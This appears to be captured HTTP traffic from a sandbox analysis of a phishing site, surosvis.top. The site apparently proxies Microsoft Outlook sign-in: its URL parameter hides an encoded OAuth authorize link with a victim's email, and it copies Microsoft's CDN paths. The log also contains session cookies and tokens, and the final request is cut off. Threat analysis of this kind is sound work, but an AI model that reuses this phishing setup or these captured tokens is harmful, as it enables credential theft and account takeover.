Source: global traffic	HTTP traffic detected: GET /?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN HTTP/1.1Host: surosvis.topConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://gaunited.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag
Source: global traffic	HTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dNAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; fpc=AnD2-tLeUdlArJB7oI4062U; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYLIX4SLlZjm9wfziP2iHzWwMirBdycGC76w3gD9t3yaSgmJO4e88O5KE29J3OPv6g7TcbBLVLqxBdT2kps5u5MJpfkub_UfDXUYevkw4T3vCoPqxc_zE4d7RLn2B7jxkHWB21zsavI3wQI5nc2qQhK73ecy891pFySk7P4UT3YEEgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pfzebkrn3nRw4rR&MD=dE5apEtF HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=true HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dNAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dNAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; fpc=AnD2-tLeUdlArJB7oI4062U; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYLIX4SLlZjm9wfziP2iHzWwMirBdycGC76w3gD9t3yaSgmJO4e88O5KE29J3OPv6g7TcbBLVLqxBdT2kps5u5MJpfkub_UfDXUYevkw4T3vCoPqxc_zE4d7RLn2B7jxkHWB21zsavI3wQI5nc2qQhK73ecy891pFySk7P4UT3YEEgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_mc5ac6ol0l4d2iaqspstyg2.css HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_Q3A1xKaK6oPrhbQSUwvJBQ2.js HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; esctx=PAQABBwEAAAApTwJmzXqdR4BN2miheQMYuR10CMjwaOfEbSWdjUV4o12tURH02Cx3glnylDoklPMrbTdcrZHU6ecFW56pH3QKmnLvYGZAjeskoL5JaQrtFzFIrmeoy2mHjfMjzVmEXI8cE5g-fbVq413cPjmjYUkO9Vbxjqda5YtwuPdwMh5CIr21Sx-2ybgzhhO53N4uWUUgAA; esctx-2mxyQonV0Zs=AQABCQEAAAApTwJmzXqdR4BN2miheQMYWPCGYCYTPVD-2_nCVHAbVTf87Ml6fHBz64tqGSkQBfWVT6USqRDy70Y0QJh0pFsy5Z57mj2bxgQH2lVjm1LJF2XIJt57eISWeYJVGD6eIR_lDOD0SZ9JGuooObCX9ubcxJR22BNOM1dCo146im0AxSAA; fpc=AnD2-tLeUdlArJB7oI4062WerOTJAQAAAPZ9H94OAAAA
Source: global traffic	HTTP traffic detected: GET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_ixsmqakdnvme1h2u2lb1cq2.js HTTP/1.1Host: surosvis.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://surosvis.top/?5ygx0kwei=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1jaGlnbGV5JTQwbGl2ZS1xdWlubi5jb20mY2xpZW50LXJlcXVlc3QtaWQ9Y2NiNjg2MjYtODJmNy00YmQ1LWIzZWYtMDhiMzhlY2M2MzA3JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODU2MTQ3OTU0ODY5NTQxNy42YmNiM2RmMC1iNDhlLTRlMDktYWUxNS0xZGZlZjUwYjU5NzQmc3RhdGU9RGN0TkRzSWdFRUJoMExPNGNFRUw2UXdfQy1OUlRLRkRPd21GbU5nYWJ5LUw5LTJlRkVKY2U1ZWUxQjNoN09UUkduQUJ3ZHVPY1lPTktVNUwxaXFDSndXa2c1ckpvREpMcG93NlluQWctM3NmMjNjZW42V3RYRjhiMTg4amJid1ctdDFBRno1SnZRLXVkVWh0X3dN&sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=6EHt3yYYhEzf; qPdM.sig=hlFz_VDQY766F2hmVBZXTNSu8mc; ClientId=CE0196B9CD1B497F9E5A407506480463; OIDC=1; OpenIdConnect.nonce.v3.RtPlv-V6bGGs0Y8zTVeXciGoosBeC6rZZ0vafGfOZ18=638561479548695417.6bcb3df0-b48e-4e09-ae15-1dfef50b5974; X-OWA-RedirectHistory=ArLym14BeXO_S0ig3Ag; esctx-XzUyERacrcw=AQABCQEAAAApTwJmzXqdR4BN2miheQMY4LpMm3o2SXJYuMM1yJdoBjrc26M2cv_fSiTwqneuLiQxS3Jbr4JMxsFOMvSHfPI16tXgX26mXTSr4mfplSdM9iYaeg59a0-h2iZh8LD__ryUeBFg6JOikENPWCO351z7HXMPcVJQODNEEnOkj2k84CAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AcoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAAApTwJmzXqdR4BN2miheQMYkM8kEq6J_TqLxIEzQLsumjMivj4zri0-eVnGF8LVRXvHN80YL1Boo4N4vPaKLChNLLdt1aK7ohMo2j1IuY3h80fDnRFWYCX29GgBbZ8TE90gAA; 